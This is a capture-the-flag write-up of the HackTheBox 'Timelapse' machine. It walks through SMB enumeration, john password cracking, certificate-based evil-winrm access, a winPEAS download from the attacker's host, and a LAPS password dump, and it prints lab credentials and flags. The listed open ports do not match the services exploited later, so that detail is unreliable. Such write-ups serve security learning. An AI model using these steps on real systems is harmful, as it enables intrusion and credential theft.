d3vyce
095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
150 lines
4.9 KiB
Markdown
150 lines
4.9 KiB
Markdown
---
|
|
title: "Writeup - Timelapse (HTB)"
|
|
date: 2022-04-03
|
|
slug: "writeup-timelapse-htb"
|
|
type: "writeup-ctf"
|
|
---
|
|
|
|
This is a writeup for the [Timelapse](https://app.hackthebox.com/machines/Timelapse) machine from the HackTheBox site.
|
|
|
|
## Enumeration
|
|
|
|
First, let's start with a scan of our target with the following command:
|
|
|
|
|
|
```bash
|
|
nmap -sV -T4 -Pn 10.129.188.205
|
|
```
|
|
Many TCP ports are discovered:
|
|
|
|
|
|
|
|
- 22/tcp : SSH port (OpenSSH 8.2)
|
|
- 80/tcp : HTTP web server (Apache 2.4.41)
|
|
|
|
## Exploit
|
|
|
|
First I start by listing the SMB shares with the `guest` account:
|
|
|
|
|
|
```bash
|
|
enum4linux -a -u "guest" -p "" 10.129.188.205
|
|
```
|
|
|
|
|
|
The `Shares` folder is available for reading, let's see what we can find in it:
|
|
|
|
|
|
|
|
We find two folders, in one of the two folders we find the file `winrm_backup.zip`, I download it then I try to unzip it. Problem is that it is protected by a password. Let's try to crack this password with john. To do so, I start by extracting the hash with the following command:
|
|
|
|
|
|
```bash
|
|
zip2john winrm_backup.zip > hash
|
|
```
|
|
Then I launch the dictionary attack with john with the rockyou dictionary:
|
|
|
|
|
|
|
|
Quickly I find that the password is `supremelagacy`. So now I can unpack the archive. In this archive I find a file with the extension `.pfx`. These files are used by windows to store certificates in `PKCS#12` format. From this file we have the possibility to retrieve the certificate and the private key (cf. [ibm.com](https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file)). To do so, I use the following commands:
|
|
|
|
|
|
```bash
|
|
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
|
|
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
|
|
```
|
|
Problem: the certificate is also protected by a password. I test the password previously found, but without success. Once again we will have to use john to brute force the password. First I get the hash with the following command:
|
|
|
|
|
|
```bash
|
|
pfx2john legacyy_dev_auth.pfx > hashbis
|
|
```
|
|
Then I launch the dictionary attack with john :
|
|
|
|
|
|
|
|
I find the password `thuglegacy`, I can now extract the private key and the certificate. I then test to connect to the machine with these two files for authentication. For that I use `evil-winrm` with the following command:
|
|
|
|
|
|
```bash
|
|
evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key -p -u
|
|
```
|
|
|
|
|
|
I now have a shell with the `legacyy` user and I can get the first flag.
|
|
|
|
|
|
```bash
|
|
*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt
|
|
6a29afecacdabd66d286759e1f1379ff
|
|
```
|
|
## Privilege escalation
|
|
|
|
For the elevation of privilege I start by uploding winPEAS then I execute it :
|
|
|
|
|
|
```bash
|
|
powershell "Invoke-WebRequest -UseBasicParsing 10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe"
|
|
./winPEASx64.exe
|
|
```
|
|
In the result of the program, I find that a file containing a command history exists on the machine:
|
|
|
|
|
|
|
|
I get it on my machine with the following command:
|
|
|
|
|
|
```bash
|
|
download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
|
```
|
|
|
|
```bash
|
|
whoami
|
|
ipconfig /all
|
|
netstat -ano |select-string LIST
|
|
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
|
|
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
|
|
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
|
|
invoke-command -computername localhost -credential $c -port 5986 -usessl -
|
|
SessionOption $so -scriptblock {whoami}
|
|
get-aduser -filter * -properties *
|
|
exit
|
|
```
|
|
Looking at the contents of the file I find a user and his password!
|
|
|
|
Another thing that winPEAS teaches me is that the user svc\_deploy has the right to read the LAPS passwords attribute!
|
|
|
|
|
|
> The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.
|
|
|
|
So I try to do it with the [LAPSDumper](https://github.com/n00py/LAPSDumper/blob/main/laps.py) script with the following command:
|
|
|
|
|
|
```bash
|
|
┌──(d3vyce㉿kali)-[~/Documents]
|
|
└─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
|
|
DC01$:J3V}8QBsB4Q6+jgveai$7}}M
|
|
```
|
|
The script finds the administrator password of the machine! I can now connect with the following command:
|
|
|
|
|
|
```bash
|
|
evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M'
|
|
```
|
|
|
|
|
|
I now have a shell as Administrator and I can retrieve the last flag.
|
|
|
|
|
|
```powershell
|
|
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
|
|
09cec1f63345aa18fcf4bd05b9be6714
|
|
```
|
|
## Recommendations
|
|
|
|
To patch this host I think it would be necessary to perform a number of actions:
|
|
|
|
- Do not allow SMB shares containing important files to be accessed by unidentified users
|
|
- Do not use weak passwords to protect certificates
|
|
- Do not leave files with clear passwords
|